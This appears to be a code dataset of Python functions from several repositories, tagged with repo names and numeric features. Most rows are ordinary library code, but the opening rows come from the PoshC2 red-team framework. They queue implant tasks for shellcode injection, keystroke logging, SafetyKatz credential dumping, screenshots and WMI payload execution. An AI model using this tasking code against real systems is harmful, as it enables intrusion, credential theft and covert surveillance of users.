function stringlengths 11 56k | repo_name stringlengths 5 60 | features list |
|---|---|---|
def do_searchallhelp(user, command, randomuri):
    """Print every help line containing the search term (case-insensitive)."""
    searchterm = command.replace("searchallhelp ", "")
    # Bug fix: each help line is lowercased for the comparison, so the
    # term must be lowercased too or mixed-case input never matches.
    searchterm = searchterm.lower()
    for line in allhelp:
        if searchterm in line.lower():
            print(Colours.GREEN + line)
1460,
291,
1460,
19,
1532336012
] |
def do_upload_file(user, command, randomuri):
    """Queue an upload-file task for the implant.

    Interactive mode (bare 'upload-file'): prompt for the local source
    (relative to PayloadsDirectory) and the remote destination.
    Non-interactive mode: parse source/destination from the command line.
    """
    # TODO lots of common code
    source = ""
    destination = ""
    if command == "upload-file":
        # interactive prompt styling (green text)
        style = Style.from_dict({
            '': '#80d130',
        })
        session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
        try:
            source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
            source = PayloadsDirectory + source
        except KeyboardInterrupt:
            # user aborted the prompt; queue nothing
            return
        # re-prompt until the local file actually exists
        while not os.path.isfile(source):
            print("File does not exist: %s" % source)
            source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
            source = PayloadsDirectory + source
        destination = session.prompt("Location to upload to: ")
    else:
        # arguments already supplied on the command line
        args = argp(command)
        source = args.source
        destination = args.destination
    try:
        # escape backslashes for the Windows-side path
        destination = destination.replace("\\", "\\\\")
        print("")
        print("Uploading %s to %s" % (source, destination))
        uploadcommand = f"upload-file {source} {destination}"
        new_task(uploadcommand, user, randomuri)
    except Exception as e:
        print("Error with source file: %s" % e)
        traceback.print_exc() | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_migrate(user, command, randomuri):
    """Inject the matching shellcode payload into a new process on the implant.

    Picks the payload file by the implant's architecture and comms type
    (C# / Daisy / Proxy), then queues an Inject-Shellcode task.
    """
    params = re.compile("migrate", re.IGNORECASE)
    params = params.sub("", command)
    implant = get_implantdetails(randomuri)
    implant_arch = implant.Arch
    implant_comms = implant.Pivot
    if implant_arch == "AMD64":
        arch = "64"
    else:
        arch = "86"
    if implant_comms == "C#":
        path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
    elif "Daisy" in implant_comms:
        daisyname = input("Name required: ")
        path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, daisyname, arch)
    elif "Proxy" in implant_comms:
        path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
    else:
        # Bug fix: previously an unrecognised comms type fell through with
        # 'path'/'shellcodefile' unbound and crashed with NameError below.
        print("Cannot migrate: unsupported implant comms type '%s'" % implant_comms)
        return
    shellcodefile = load_file(path)
    new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
1460,
291,
1460,
19,
1532336012
] |
def do_exit(user, command, randomuri):
    """Alias: exiting an implant is the same as killing it."""
    return do_kill_implant(user, command, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_stop_keystrokes(user, command, randomuri):
    """Task the implant's keystroke logger with the stop command, then clear
    the implant's label in the UI."""
    task = "run-exe Logger.KeyStrokesClass Logger %s" % command
    new_task(task, user, randomuri)
    update_label("", randomuri)
1460,
291,
1460,
19,
1532336012
] |
def do_get_keystrokes(user, command, randomuri):
    """Queue a keystroke-logger task (retrieve captured keystrokes)."""
    new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_get_screenshot(user, command, randomuri):
    """Queue a screenshot task, warning first if the screen is reported locked.

    Pressing Enter or answering 'n' at the prompt aborts (default is No).
    """
    power_status = get_powerstatusbyrandomuri(randomuri)
    screen_locked = power_status is not None and power_status[7]
    if screen_locked:
        answer = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
        if answer.lower() in ("n", ""):
            return
    new_task(command, user, randomuri)
1460,
291,
1460,
19,
1532336012
] |
def do_stoppowerstatus(user, command, randomuri):
    """Queue the stop-powerstatus task and clear the implant's label."""
    new_task(command, user, randomuri)
    update_label("", randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_safetykatz(user, command, randomuri):
    """Run the SafetyKatz assembly on the implant with the given arguments."""
    new_task("run-exe SafetyKatz.Program %s" % command, user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_loadmodule(user, command, randomuri):
    """Strip the 'loadmodule ' prefix and load the named module on the implant."""
    module_name = re.sub("loadmodule ", "", command, flags=re.IGNORECASE)
    check_module_loaded(module_name, randomuri, user)
1460,
291,
1460,
19,
1532336012
] |
def do_modulesloaded(user, command, randomuri):
    """Print the modules recorded as loaded, then ask the implant for a live list."""
    details = get_implantdetails(randomuri)
    print(details.ModsLoaded)
    new_task("listmodules", user, randomuri)
1460,
291,
1460,
19,
1532336012
] |
def do_shell(user, command, randomuri):
    """Queue the raw shell command for the implant unchanged."""
    new_task(command, user, randomuri) | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_sharpwmi_execute(user, command, randomuri):
    """Prompt for a base64-encoded vbs/js payload file and queue a sharpwmi task.

    Aborts silently on Ctrl-C at the prompt; prints an error if the chosen
    file does not exist.
    """
    style = Style.from_dict({'': '#80d130'})
    session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
    try:
        path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
        path = PayloadsDirectory + path
    except KeyboardInterrupt:
        return
    if os.path.isfile(path):
        # payload is embedded directly into the task string
        with open(path, "r") as p:
            payload = p.read()
        new_task("%s payload=%s" % (command, payload), user, randomuri)
    else:
        print_bad("Could not find file") | nettitude/PoshC2 | [
1460,
291,
1460,
19,
1532336012
] |
def do_fcomm_start(user, command, randomuri):
    """Queue an fcomm-connect task, filling in the default file name and/or
    the base encryption key when they were not supplied."""
    argc = len(command.split())
    key = get_baseenckey()
    if argc == 1:
        # bare 'fcomm-connect': append both the default file name and the key
        command = f"{command} {FCommFileName} {key}"
    elif argc == 2:
        # file name already present; only the key is missing
        command = f"{command} {key}"
    else:
        print_bad("Expected 'fcomm_connect' or 'fcomm_connect <filename>'")
        return
    new_task(command, user, randomuri)
1460,
291,
1460,
19,
1532336012
] |
def __init__(self, device, path_to_detector=None, verbose=False):
    """Initialise the detector, delegating device/verbosity to the base class.

    Note: path_to_detector is accepted but unused in this visible snippet.
    """
    super(FolderDetector, self).__init__(device, verbose) | 1adrianb/face-alignment | [
6144,
1271,
6144,
68,
1505507564
] |
def detect_from_image(self, tensor_or_path):
    """Validate the detection input; only string paths are supported.

    Raises:
        ValueError: if tensor_or_path is not a str.
    """
    # Only strings supported
    if not isinstance(tensor_or_path, str):
        # Bug fix: raise with a message so callers know why it failed
        raise ValueError("FolderDetector only supports string paths, got %r"
                         % type(tensor_or_path).__name__)
6144,
1271,
6144,
68,
1505507564
] |
def reference_scale(self):
    """Fixed reference scale used by this detector."""
    REFERENCE_SCALE = 195
    return REFERENCE_SCALE
6144,
1271,
6144,
68,
1505507564
] |
def reference_x_shift(self):
    """Horizontal shift applied to the reference box (none for this detector)."""
    X_SHIFT = 0
    return X_SHIFT
6144,
1271,
6144,
68,
1505507564
] |
def _do_set_current_user(user_fun):
    """Store a user resolver in thread-local storage for get_current_user.

    NOTE(review): user_fun.__get__(user_fun, local) binds the function via
    the descriptor protocol; presumably this keeps the stored entry callable
    without extra arguments -- confirm against django-currentuser upstream
    before changing.
    """
    setattr(_thread_locals, USER_ATTR_NAME, user_fun.__get__(user_fun, local)) | PaesslerAG/django-currentuser | [
125,
35,
125,
14,
1491986156
] |
def __init__(self, get_response):
    """Standard Django middleware constructor: keep the next handler in the chain."""
    self.get_response = get_response | PaesslerAG/django-currentuser | [
125,
35,
125,
14,
1491986156
] |
def get_current_user():
    """Return the current user from thread-local storage.

    The stored entry may be a lazy resolver (callable); call it if so,
    otherwise return it directly (or None when nothing is stored).
    """
    stored = getattr(_thread_locals, USER_ATTR_NAME, None)
    return stored() if callable(stored) else stored
125,
35,
125,
14,
1491986156
] |
def __init__(self):
    """Initialise the guide server's state (nothing is started yet)."""
    self._started = False
    # uuid -> {addr: bitmap} of nodes known to hold blocks for that broadcast
    self.guides = {}
    self.host = socket.gethostname()
    self.guide_thread = None
    self.guide_addr = None
    # uuid -> the address that originally registered the broadcast
    self.register_addr = {}
    self.ctx = zmq.Context() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def start_guide(self):
    """Bind a REP socket on a random port and serve guide requests in a thread.

    Handles four message types: GUIDE_STOP, GUIDE_GET_SOURCES,
    GUIDE_SET_SOURCES and GUIDE_REPORT_BAD. Returns the spawned thread;
    self.guide_addr is set before the thread starts.
    """
    sock = self.ctx.socket(zmq.REP)
    port = sock.bind_to_random_port('tcp://0.0.0.0')
    self.guide_addr = 'tcp://%s:%d' % (self.host, port)

    def run():
        logger.debug("guide start at %s", self.guide_addr)
        while self._started:
            # 1s poll so the loop notices _started going False
            if not sock.poll(1000, zmq.POLLIN):
                continue
            type_, msg = sock.recv_pyobj()
            if type_ == GUIDE_STOP:
                sock.send_pyobj(0)
                break
            elif type_ == GUIDE_GET_SOURCES:
                uuid = msg
                sources = None
                if uuid in self.guides:
                    sources = self.guides[uuid]
                else:
                    logger.warning('uuid %s NOT REGISTERED in guide server', uuid)
                sock.send_pyobj(sources)
            elif type_ == GUIDE_SET_SOURCES:
                uuid, addr, bitmap = msg
                # only record senders that actually hold at least one block
                if any(bitmap):
                    sources = None
                    if uuid in self.guides:
                        sources = self.guides[uuid]
                    if sources:
                        sources[addr] = bitmap
                    else:
                        # first registration for this uuid
                        self.guides[uuid] = {addr: bitmap}
                        self.register_addr[uuid] = addr
                sock.send_pyobj(None)
            elif type_ == GUIDE_REPORT_BAD:
                uuid, addr = msg
                sources = self.guides[uuid]
                if addr in sources:
                    # never evict the original registrant
                    if addr != self.register_addr[uuid]:
                        del sources[addr]
                    else:
                        logger.warning('The addr %s to delete is the register Quit!!!', addr)
                sock.send_pyobj(None)
            else:
                logger.error('Unknown guide message: %s %s', type_, msg)
                sock.send_pyobj(None)
    return spawn(run) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def check_memory(location):
    """Log this process's resident set size in MB, tagged with *location*.

    Degrades to a warning when psutil is not installed.
    """
    try:
        import psutil
    except ImportError:
        logger.warning('import psutil failed')
        return
    pid = os.getpid()
    p = psutil.Process(pid)
    rss = p.memory_info().rss >> 20  # bytes -> MB
    # Bug fix: the format string had three arguments but only two
    # placeholders ('... at ' with no %s), so logging raised/dropped
    # the 'location' argument.
    logger.info('memory rss %d MB in host %s at %s',
                rss, socket.gethostname(), location)
2692,
550,
2692,
1,
1334133306
] |
def __init__(self):
    """Initialise the download manager's state; real setup happens at start."""
    self._started = False
    self.server_thread = None
    # uuid -> running downloader thread
    self.download_threads = {}
    self.uuid_state_dict = None
    self.uuid_map_dict = None
    self.guide_addr = None
    self.server_addr = None
    self.host = None
    self.ctx = None
    self.random_inst = None
    # uuid -> list of blocks held in memory on the master
    self.master_broadcast_blocks = {} | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def start_server(self):
    """Bind a REP socket and serve block-fetch / data-get requests in a thread.

    Returns (server_addr, thread). Handles SERVER_STOP, SERVER_FETCH,
    DATA_GET and SERVER_CLEAR_ITEM messages; all broadcast state is
    cleared when the loop exits.
    """
    sock = self.ctx.socket(zmq.REP)
    sock.setsockopt(zmq.LINGER, 0)
    port = sock.bind_to_random_port("tcp://0.0.0.0")
    server_addr = 'tcp://%s:%d' % (self.host, port)
    guide_sock = self.ctx.socket(zmq.REQ)
    guide_sock.setsockopt(zmq.LINGER, 0)
    guide_sock.connect(self.guide_addr)

    def run():
        logger.debug("server started at %s", server_addr)
        while self._started:
            # 1s poll so the loop notices _started going False
            if not sock.poll(1000, zmq.POLLIN):
                continue
            type_, msg = sock.recv_pyobj()
            logger.debug('server recv: %s %s', type_, msg)
            if type_ == SERVER_STOP:
                sock.send_pyobj(None)
                break
            elif type_ == SERVER_FETCH:
                uuid, indices, client_addr = msg
                if uuid in self.master_broadcast_blocks:
                    # master holds the blocks in memory
                    block_num = len(self.master_broadcast_blocks[uuid])
                    bls = []
                    for index in indices:
                        if index >= block_num:
                            logger.warning('input index too big %s for '
                                           'len of blocks %d from host %s',
                                           str(indices), block_num, client_addr)
                            # NOTE(review): sending FETCH_FAIL here and
                            # FETCH_OK after the loop is a double send on a
                            # REP socket -- looks suspect; confirm upstream.
                            sock.send_pyobj((SERVER_FETCH_FAIL, None))
                        else:
                            bls.append(self.master_broadcast_blocks[uuid][index])
                    sock.send_pyobj((SERVER_FETCH_OK, (indices, bls)))
                elif uuid in self.uuid_state_dict:
                    # worker holds the blocks in a memory-mapped file
                    fd = os.open(self.uuid_state_dict[uuid][0], os.O_RDONLY)
                    mmfp = mmap.mmap(fd, 0, access=ACCESS_READ)
                    os.close(fd)
                    bitmap = self.uuid_map_dict[uuid]
                    block_num = len(bitmap)
                    bls = []
                    for index in indices:
                        if index >= block_num:
                            logger.warning('input index too big %s for '
                                           'len of blocks %d from host %s',
                                           str(indices), block_num, client_addr)
                            sock.send_pyobj((SERVER_FETCH_FAIL, None))
                        else:
                            # bitmap entries are (offset, size) in the file
                            mmfp.seek(bitmap[index][0])
                            block = mmfp.read(bitmap[index][1])
                            bls.append(block)
                    mmfp.close()
                    sock.send_pyobj((SERVER_FETCH_OK, (indices, bls)))
                else:
                    logger.warning('server fetch failed for uuid %s '
                                   'not exists in server %s from host %s',
                                   uuid, socket.gethostname(), client_addr)
                    sock.send_pyobj((SERVER_FETCH_FAIL, None))
            elif type_ == DATA_GET:
                uuid, compressed_size = msg
                if uuid not in self.uuid_state_dict or not self.uuid_state_dict[uuid][1]:
                    if uuid not in self.download_threads:
                        # not yet downloading: ask the guide for sources
                        sources = self._get_sources(uuid, guide_sock)
                        if not sources:
                            logger.warning('get sources from guide server failed in host %s',
                                           socket.gethostname())
                            sock.send_pyobj(DATA_GET_FAIL)
                            continue
                        self.download_threads[uuid] = spawn(self._download_blocks,
                                                            *[sources, uuid, compressed_size])
                        sock.send_pyobj(DATA_DOWNLOADING)
                    else:
                        # download already in progress
                        sock.send_pyobj(DATA_DOWNLOADING)
                else:
                    sock.send_pyobj(DATA_GET_OK)
            elif type_ == SERVER_CLEAR_ITEM:
                uuid = msg
                self.clear(uuid)
                sock.send_pyobj(None)
            else:
                logger.error('Unknown server message: %s %s', type_, msg)
                sock.send_pyobj(None)
        sock.close()
        logger.debug("stop Broadcast server %s", server_addr)
        for uuid in list(self.uuid_state_dict.keys()):
            self.clear(uuid)
    return server_addr, spawn(run) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def register_blocks(self, uuid, blocks):
    """Record master-side broadcast blocks for *uuid*.

    A repeated registration is logged and ignored.
    """
    known = self.master_broadcast_blocks
    if uuid in known:
        logger.warning('the block uuid %s exists in dict', uuid)
        return
    known[uuid] = blocks
    self.shared_master_blocks[uuid] = blocks
2692,
550,
2692,
1,
1334133306
] |
def _update_sources(self, uuid, bitmap, source_sock):
    """Best-effort: tell the guide server which blocks this node now holds."""
    try:
        source_sock.send_pyobj((GUIDE_SET_SOURCES,
                                (uuid, self.server_addr, bitmap)))
        source_sock.recv_pyobj()
    except Exception:
        # Bug fix: the bare 'except:' also swallowed SystemExit and
        # KeyboardInterrupt; keep the deliberate best-effort behaviour
        # but only for real errors.
        pass
2692,
550,
2692,
1,
1334133306
] |
def _report_bad(addr):
    """Tell the guide server that fetching blocks from *addr* failed.

    Nested helper: 'uuid' and 'download_guide_sock' come from the
    enclosing download routine's scope.
    """
    logger.debug('fetch blocks failed from server %s', addr)
    download_guide_sock.send_pyobj((GUIDE_REPORT_BAD, (uuid, addr)))
    download_guide_sock.recv_pyobj() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def clear(self, uuid):
    """Forget every piece of state held for broadcast *uuid* on this node."""
    if uuid in self.master_broadcast_blocks:
        self.master_broadcast_blocks.pop(uuid)
        self.shared_master_blocks.pop(uuid)
    if uuid in self.uuid_state_dict:
        self.uuid_state_dict.pop(uuid)
    if uuid in self.shared_uuid_fn_dict:
        self.shared_uuid_fn_dict.pop(uuid)
        self.shared_uuid_map_dict.pop(uuid)
2692,
550,
2692,
1,
1334133306
] |
def accumulate_list(l):
    """Return prefix sums of *l* starting at 0 (length len(l) + 1).

    e.g. [1, 2, 3] -> [0, 1, 3, 6]
    """
    sums = [0]
    for item in l:
        sums.append(sums[-1] + item)
    return sums
2692,
550,
2692,
1,
1334133306
] |
def __init__(self):
    """Initialise the client-side manager; all fields are filled at start."""
    self._started = False
    self.guide_addr = None
    self.download_addr = None
    self.cache = None
    self.shared_uuid_fn_dict = None
    self.shared_uuid_map_dict = None
    self.download_cond = None
    self.ctx = None | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def register(self, uuid, value):
    """Split *value* into compressed blocks, publish them, and cache the value.

    Returns the total compressed size in bytes.
    Raises RuntimeError if *uuid* was already registered.
    """
    self.start()
    if uuid in self.shared_uuid_fn_dict:
        raise RuntimeError('broadcast %s has already registered' % uuid)
    blocks, size, block_map = self.to_blocks(uuid, value)
    # make the blocks fetchable and announce them to the guide server
    _download_manager.register_blocks(uuid, blocks)
    self._update_sources(uuid, block_map)
    self.cache.put(uuid, value)
    return size | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def clear(self, uuid):
    """Invalidate the local cache entry and ask the download server to drop *uuid*."""
    assert self._started
    self.cache.put(uuid, None)
    # synchronous REQ/REP round-trip to the download server
    sock = self.ctx.socket(zmq.REQ)
    sock.connect(self.download_addr)
    sock.send_pyobj((SERVER_CLEAR_ITEM, uuid))
    sock.recv_pyobj()
    sock.close() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def _get_blocks_by_filename(file_name, block_map):
fp = open(file_name, 'rb')
buf = fp.read()
blocks = [buf[offset: offset + size] for offset, size in block_map]
fp.close()
return blocks | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def to_blocks(self, uuid, obj):
    """Serialise *obj* and split it into compressed fixed-size blocks.

    Returns (blocks, total_compressed_size, block_map) where block_map is a
    list of (offset, size) pairs into the concatenated compressed stream.
    """
    try:
        # prefer marshal (faster) when the object supports it
        if marshalable(obj):
            buf = marshal.dumps((uuid, obj))
            type_ = MARSHAL_TYPE
        else:
            buf = cPickle.dumps((uuid, obj), -1)
            type_ = PICKLE_TYPE
    except Exception:
        # fall back to pickle if marshal fails mid-way
        buf = cPickle.dumps((uuid, obj), -1)
        type_ = PICKLE_TYPE
    # 16-bit checksum stored in the stream header
    checksum = binascii.crc32(buf) & 0xFFFF
    stream = struct.pack(self.header_fmt, type_, checksum) + buf
    # ceil(len / BLOCK_SIZE) via shift
    blockNum = (len(stream) + (BLOCK_SIZE - 1)) >> BLOCK_SHIFT
    blocks = [compress(stream[i * BLOCK_SIZE:(i + 1) * BLOCK_SIZE]) for i in range(blockNum)]
    sizes = [len(block) for block in blocks]
    size_l = accumulate_list(sizes)
    block_map = list(izip(size_l[:-1], sizes))
    return blocks, size_l[-1], block_map | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def shutdown(self):
    """Mark the manager as stopped; calling it again is a no-op."""
    if self._started:
        self._started = False
2692,
550,
2692,
1,
1334133306
] |
def start_guide_manager():
    """Start the module-level guide server singleton."""
    _guide_manager.start() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def stop_manager():
    """Shut down all broadcast managers and drop their addresses from env."""
    _manager.shutdown()
    _download_manager.shutdown()
    _guide_manager.shutdown()
    # pop with default: safe even if the addresses were never published
    env.environ.pop(GUIDE_ADDR, None)
    env.environ.pop(DOWNLOAD_ADDR, None) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __init__(self, value):
    """Register *value* as a broadcast variable under a fresh uuid."""
    assert value is not None, 'broadcast object should not been None'
    self.uuid = str(uuid_pkg.uuid4())
    self.value = value
    # register() returns the total compressed size in bytes
    self.compressed_size = _manager.register(self.uuid, self.value)
    # ceil-divide into fixed-size blocks
    block_num = (self.compressed_size + BLOCK_SIZE - 1) >> BLOCK_SHIFT
    self.bytes = block_num * BLOCK_SIZE
    logger.info("broadcast %s in %d blocks, %d bytes", self.uuid, block_num, self.compressed_size) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __getstate__(self):
return self.uuid, self.compressed_size | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __getattr__(self, name):
    """Lazily fetch the broadcast value on first attribute access.

    Any attribute other than 'value' is proxied to the value object;
    asking for 'value' triggers the actual fetch.
    NOTE(review): 'self.value' below re-enters __getattr__ while the value
    is unset -- the lazy-fetch path relies on that; confirm before
    restructuring.
    """
    if name != 'value':
        return getattr(self.value, name)
    t = time.time()
    value = _manager.fetch(self.uuid, self.compressed_size)
    if value is None:
        raise RuntimeError("fetch broadcast failed")
    # account fetch time against the task's broadcast budget
    env.task_stats.secs_broadcast += time.time() - t
    # cache on the instance so later accesses skip __getattr__
    self.value = value
    return value | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __iter__(self):
return self.value.__iter__() | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __contains__(self, item):
return self.value.__contains__(item) | douban/dpark | [
2692,
550,
2692,
1,
1334133306
] |
def __init__(self, base_estimator, n_estimators=10,
             estimator_params=tuple()):
    """Store ensemble configuration without instantiating any estimators.

    estimator_params names the attributes copied onto each sub-estimator
    by _make_estimator.
    """
    # Set parameters
    self.base_estimator = base_estimator
    self.n_estimators = n_estimators
    self.estimator_params = estimator_params
    # Don't instantiate estimators now! Parameters of base_estimator might
    # still change. Eg., when grid-searching with the nested object syntax.
    # This needs to be filled by the derived classes.
    self.estimators_ = [] | psarka/uplift | [
33,
12,
33,
1,
1463903894
] |
def _make_estimator(self, append=True):
    """Make and configure a copy of the `base_estimator_` attribute.

    Warning: This method should be used to properly instantiate new
    sub-estimators.
    """
    estimator = clone(self.base_estimator_)
    # copy the declared parameters from the ensemble onto the clone
    params = {name: getattr(self, name) for name in self.estimator_params}
    estimator.set_params(**params)
    if append:
        self.estimators_.append(estimator)
    return estimator
33,
12,
33,
1,
1463903894
] |
def __getitem__(self, index):
"""Returns the index'th estimator in the ensemble."""
return self.estimators_[index] | psarka/uplift | [
33,
12,
33,
1,
1463903894
] |
def _partition_estimators(n_estimators, n_jobs):
    """Private function used to partition estimators between jobs.

    Returns (n_jobs, counts_per_job, start_offsets) where start_offsets has
    n_jobs + 1 entries bracketing each job's slice.
    """
    # Compute the number of jobs
    n_jobs = min(_get_n_jobs(n_jobs), n_estimators)
    # Partition estimators between jobs.
    # Bug fix: the np.int alias was removed in NumPy 1.24; the builtin
    # int is the documented equivalent dtype.
    n_estimators_per_job = (n_estimators // n_jobs) * np.ones(n_jobs,
                                                              dtype=int)
    # distribute the remainder one-per-job to the first jobs
    n_estimators_per_job[:n_estimators % n_jobs] += 1
    starts = np.cumsum(n_estimators_per_job)
    return n_jobs, n_estimators_per_job.tolist(), [0] + starts.tolist()
33,
12,
33,
1,
1463903894
] |
def __init__(self, repeat, n_iter, verbose):
    """Store benchmark configuration: repetitions, EM iterations, verbosity."""
    self.repeat = repeat
    self.n_iter = n_iter
    self.verbose = verbose | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def generate_training_sequences(self):
    """Hook for subclasses: produce (sequences, lengths) training data."""
    pass | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def run(self, results_file):
    """Benchmark both EM implementations and write a CSV of timings.

    Each row of *results_file*: configuration, mean, std, n_iterations, repeat.
    """
    runtimes = collections.defaultdict(dict)
    sequences, lengths = self.generate_training_sequences()
    for implementation in ["scaling", "log"]:
        model = self.new_model(implementation)
        LOG.info(f"{model.__class__.__name__}: testing {implementation}")
        key = f"{model.__class__.__name__}|EM|hmmlearn-{implementation}"
        # benchmark() returns per-repeat elapsed times (array-like)
        elapsed = self.benchmark(sequences, lengths, model, key)
        runtimes[key]["mean"] = elapsed.mean()
        runtimes[key]["std"] = elapsed.std()
    with open(results_file, mode="w") as fd:
        fd.write("configuration,mean,std,n_iterations,repeat\n")
        for key, value in runtimes.items():
            fd.write(f"{key},{value['mean']},{value['std']},"
                     f"{self.n_iter},{self.repeat}\n") | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def new_model(self, implementation):
    """Build the 4-state full-covariance GaussianHMM under benchmark."""
    return hmmlearn.hmm.GaussianHMM(
        n_components=4,
        n_iter=self.n_iter,
        covariance_type="full",
        implementation=implementation,
        verbose=self.verbose
    ) | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def log_one_run(self, start, end, model, tag):
    """Log base-run info plus the fitted Gaussian parameters."""
    super().log_one_run(start, end, model, tag)
    LOG.info(f"means={model.means_}")
    LOG.info(f"covars={model.covars_}") | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def new_model(self, implementation):
    """Build the 3-state MultinomialHMM under benchmark."""
    return hmmlearn.hmm.MultinomialHMM(
        n_components=3,
        n_iter=self.n_iter,
        verbose=self.verbose,
        implementation=implementation
    ) | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def log_one_run(self, start, end, model, tag):
    """Log base-run info plus the fitted emission probabilities."""
    super().log_one_run(start, end, model, tag)
    LOG.info(f"emissions={model.emissionprob_}") | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def generate_training_sequences(self):
    """Sample one long sequence from a fixed 4-state 2-D GaussianHMM.

    Returns (observed, lengths) with a single 50000-sample sequence.
    """
    sampler = hmmlearn.hmm.GaussianHMM(
        n_components=4,
        covariance_type="full",
        init_params=""
    )
    # always start in the last state
    sampler.startprob_ = np.asarray([0, 0, 0, 1])
    sampler.transmat_ = np.asarray([
        [.2, .2, .3, .3],
        [.3, .2, .2, .3],
        [.2, .3, .3, .2],
        [.3, .3, .2, .2],
    ])
    # states differ only along the first dimension
    sampler.means_ = np.asarray([
        [-1.5, 0],
        [0, 0],
        [1.5, 0],
        [3, 0]
    ])
    # identical isotropic covariances for all states
    sampler.covars_ = np.asarray([
        [[.5, 0],
         [0, .5]],
        [[.5, 0],
         [0, 0.5]],
        [[.5, 0],
         [0, .5]],
        [[0.5, 0],
         [0, 0.5]],
    ])
    observed, hidden = sampler.sample(50000)
    lengths = [len(observed)]
    return observed, lengths | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def generate_training_sequences(self):
    """Sample n_sequences of equal length from a fixed 4-state, 3-mixture GMMHMM.

    Returns (concatenated_observations, lengths) suitable for hmmlearn.fit.
    """
    sampler = hmmlearn.hmm.GMMHMM(
        n_components=4,
        n_mix=3,
        covariance_type="full",
        init_params=""
    )
    sampler.startprob_ = [.25, .25, .25, .25]
    sampler.transmat_ = [
        [.1, .3, .3, .3],
        [.3, .1, .3, .3],
        [.3, .3, .1, .3],
        [.3, .3, .3, .1],
    ]
    sampler.weights_ = [
        [.2, .2, .6],
        [.6, .2, .2],
        [.2, .6, .2],
        [.1, .1, .8],
    ]
    # well-separated 1-D mixture means per state
    sampler.means_ = np.asarray([
        [[-10], [-12], [-9]],
        [[-5], [-4], [-3]],
        [[-1.5], [0], [1.5]],
        [[5], [7], [9]],
    ])
    sampler.covars_ = np.asarray([
        [[[.125]], [[.125]], [[.125]]],
        [[[.125]], [[.125]], [[.125]]],
        [[[.125]], [[.125]], [[.125]]],
        [[[.125]], [[.125]], [[.125]]],
    ])
    n_sequences = 10
    length = 5_000
    sequences = []
    for i in range(n_sequences):
        # Fix: use the declared `length` instead of a duplicated literal so
        # the reported lengths always match the sampled data.
        sequences.append(sampler.sample(length)[0])
    return np.concatenate(sequences), [length] * n_sequences
2720,
721,
2720,
52,
1395570789
] |
def log_one_run(self, start, end, model, tag):
    """Log base-run info plus the fitted mixture weights."""
    super().log_one_run(start, end, model, tag)
    LOG.info(f"weights_={model.weights_}") | hmmlearn/hmmlearn | [
2720,
721,
2720,
52,
1395570789
] |
def setup_all():
    """Prepare fixture state on the shared test context `_` and bootstrap the iPod.

    Creates two playlists so rename tests have an existing target to collide with.
    """
    _.new_name = 'leño'
    _.playlist_name = 'playlist'
    _.existing_name = 'roña'
    update_environment(_)
    bootstrap_ipod(_.mountpoint_path)
    create_playlist(_.mountpoint_path, _.playlist_name)
    create_playlist(_.mountpoint_path, _.existing_name) | jvrsantacruz/ipodio | [
15,
1,
15,
9,
1371683448
] |
def should_print_an_error_():
    """Renaming from a non-existent playlist should report 'does not exist'."""
    execution = _.env.run(*_.cmd + ['playlist', 'rename', _.new_name, _.playlist_name])
    expect(execution.stdout).to.have('does not exist') | jvrsantacruz/ipodio | [
15,
1,
15,
9,
1371683448
] |
def should_print_an_error__():
    """Calling rename without arguments should fail and print usage."""
    execution = _.env.run(*_.cmd + ['playlist', 'rename'], expect_error=True)
    expect(execution.stderr).to.have('Usage:') | jvrsantacruz/ipodio | [
15,
1,
15,
9,
1371683448
] |
def should_print_an_error___():
    """Renaming onto an existing playlist name should report 'already exists'."""
    execution = _.env.run(*_.cmd + ['playlist', 'rename', _.playlist_name, _.existing_name])
